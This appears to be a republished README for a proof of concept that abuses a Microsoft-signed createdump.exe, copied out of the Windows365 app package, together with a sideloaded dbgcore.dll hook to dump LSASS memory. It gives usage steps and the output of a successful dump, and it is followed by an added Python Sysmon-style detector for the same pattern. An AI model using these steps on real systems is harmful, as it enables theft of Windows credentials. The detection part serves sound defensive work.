This project demonstrates how createdump.exe, a Microsoft-signed executable shipped inside a Windows app package, can be used to dump the LSASS process, with a custom hook granting the process access to LSASS.
Get-AuthentiCodeSignature -FilePath (Join-Path -Path (Get-AppxPackage -Name *Windows365*).InstallLocation -ChildPath 'wnccreatedump.exe')
Directory: C:\Program Files\WindowsApps\MicrosoftCorporationII.Windows365_2.0.285.0_x64__8wekyb3d8bbwe\wnc
SignerCertificate Status StatusMessage Path
----------------- ------ ------------- ----
C2048FB509F1C37A8C3E9EC6648118458AA01780 Valid Signature verified. createdump.exe
How to use
- Copy createdump from the WindowsApps folder to a folder of your choice (copy "C:\Program Files\WindowsApps\MicrosoftCorporationII.Windows365_2.0.285.0_x64__8wekyb3d8bbwe\wnc\createdump.exe" .)
- Place the dbgcore.dll from this repo in the same folder.
- Run createdump (optionally supplying parameters).
Note: administrator privileges are required.
The output should look like this:
c:work_createdump>createdump.exe
WindowsApp PoC by Remko Weijnen
(ab)uses createdump tool from "The WindowsApp" to create an LSASS dump
Successfully hooked OpenProcess
OpenProcess called
Attempting to enable SeDebugPrivilege...
SeDebugPrivilege successfully enabled!
Attempting to impersonate winlogon...
Successfully impersonated winlogon
[createdump] Writing minidump with heap for process 35828 to file C:\Users\me\AppData\Local\Temp\dump.35828.dmp
MiniDumpWriteDump called with:
ProcessId: 35828
hProcess: 0x0000000000000184
hFile: 0x00000000000001BC
DumpType: 0x41a25
ProcessId changed to LSASS (PID: 1512)
Loaded DbgHelp.dll from: C:\Windows\System32\DbgCore.dll
Calling original with:
ProcessId: 1512
hProcess: 0x0000000000000184
hFile: 0x00000000000001BC
DumpType: 0x41026
MiniDumpWriteDump result: Success
[createdump] Dump successfully written in 270ms
DLL unloading, hooks removed.
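The sequence visible in the output above (a signed createdump.exe running outside its WindowsApps install folder, a dbgcore.dll resolved from that same folder instead of System32, an open of lsass.exe with read access, and a .dmp written to Temp) is also what a defender can key on. The following Python script is an added example and not part of the createdump project: it runs four checks over constructed Sysmon-style events (field names follow Sysmon Event IDs 1, 7, 10 and 11; the event values, PIDs and the reader allowlist are invented for this example) and correlates a .dmp write back to a process that was earlier seen reading LSASS.

```python
"""Toy detector for the createdump / dbgcore.dll sideload pattern (added example).

Assumptions (not from the original project): events are Sysmon-style records
already parsed into dicts, and field names follow Sysmon (Image, ImageLoaded,
SourceImage, TargetImage, GrantedAccess, TargetFilename). Sample events and the
allowlist below are constructed for this example only.
"""
import ntpath

# Access bits MiniDumpWriteDump needs on the target process handle.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
# Processes that legitimately read LSASS memory (constructed list; tune per environment).
LSASS_READERS_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

def base(path):
    return ntpath.basename(path).lower()

def check_process_create(ev):
    """Sysmon event 1: a packaged-app binary started from outside \\WindowsApps\\."""
    image = ev["Image"].lower()
    if base(image) == "createdump.exe" and "\\windowsapps\\" not in image:
        return f"createdump.exe started outside its package folder: {ev['Image']}"
    return None

def check_image_load(ev):
    """Sysmon event 7: a debugging DLL resolved from a non-system directory (sideload)."""
    loaded = ev["ImageLoaded"]
    if base(loaded) in ("dbgcore.dll", "dbghelp.dll") and not ntpath.dirname(loaded).lower().startswith(SYSTEM_DIRS):
        return f"{base(ev['Image'])} loaded {base(loaded)} from non-system path {loaded}"
    return None

def check_process_access(ev):
    """Sysmon event 10: a non-allowlisted process opened lsass.exe with PROCESS_VM_READ."""
    if base(ev["TargetImage"]) != "lsass.exe":
        return None
    access = int(ev["GrantedAccess"], 16)
    source = ev["SourceImage"].lower()
    if access & PROCESS_VM_READ and source not in LSASS_READERS_ALLOWLIST:
        return f"{base(source)} opened lsass.exe with 0x{access:04x} (includes PROCESS_VM_READ)"
    return None

def check_file_create(ev, lsass_readers):
    """Sysmon event 11: a minidump written by a process already seen reading LSASS."""
    if ev["TargetFilename"].lower().endswith(".dmp") and ev["Image"].lower() in lsass_readers:
        return f"{base(ev['Image'])} wrote {ev['TargetFilename']} after reading LSASS"
    return None

def scan(events):
    """Return (rule, message) pairs; stateful so the .dmp write can be correlated."""
    alerts = []
    lsass_readers = set()
    for ev in events:
        eid = ev["EventID"]
        if eid == 1:
            rule, msg = "unexpected-location", check_process_create(ev)
        elif eid == 7:
            rule, msg = "dll-sideload", check_image_load(ev)
        elif eid == 10:
            rule, msg = "lsass-read", check_process_access(ev)
            if msg:
                lsass_readers.add(ev["SourceImage"].lower())
        elif eid == 11:
            rule, msg = "dump-file", check_file_create(ev, lsass_readers)
        else:
            rule, msg = "ignored", None
        if msg:
            alerts.append((rule, msg))
    return alerts

# Constructed events mirroring the run shown above; paths and access masks are invented.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\work_createdump\createdump.exe", "ProcessId": 35828},
    {"EventID": 7, "Image": r"C:\work_createdump\createdump.exe", "ImageLoaded": r"C:\work_createdump\dbgcore.dll"},
    {"EventID": 7, "Image": r"C:\work_createdump\createdump.exe", "ImageLoaded": r"C:\Windows\System32\DbgCore.dll"},
    {"EventID": 10, "SourceImage": r"C:\work_createdump\createdump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x0410"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 11, "Image": r"C:\work_createdump\createdump.exe",
     "TargetFilename": r"C:\Users\me\AppData\Local\Temp\dump.35828.dmp"},
]

if __name__ == "__main__":
    for rule, msg in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {msg}")
```

The second image-load event (the genuine DbgCore.dll from System32, which the hook DLL forwards to) and the allowlisted Defender access deliberately produce no alert, so the rules fire on the sideloaded copy and the unexpected reader rather than on the library itself; the `0x1000` access (PROCESS_QUERY_LIMITED_INFORMATION only) is likewise ignored because it cannot read process memory.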
Project address:
https://github.com/rweijnen/createdump
Originally published on the WeChat public account (Ots安全): Using the WindowsApp createdump tool to obtain an lsass dump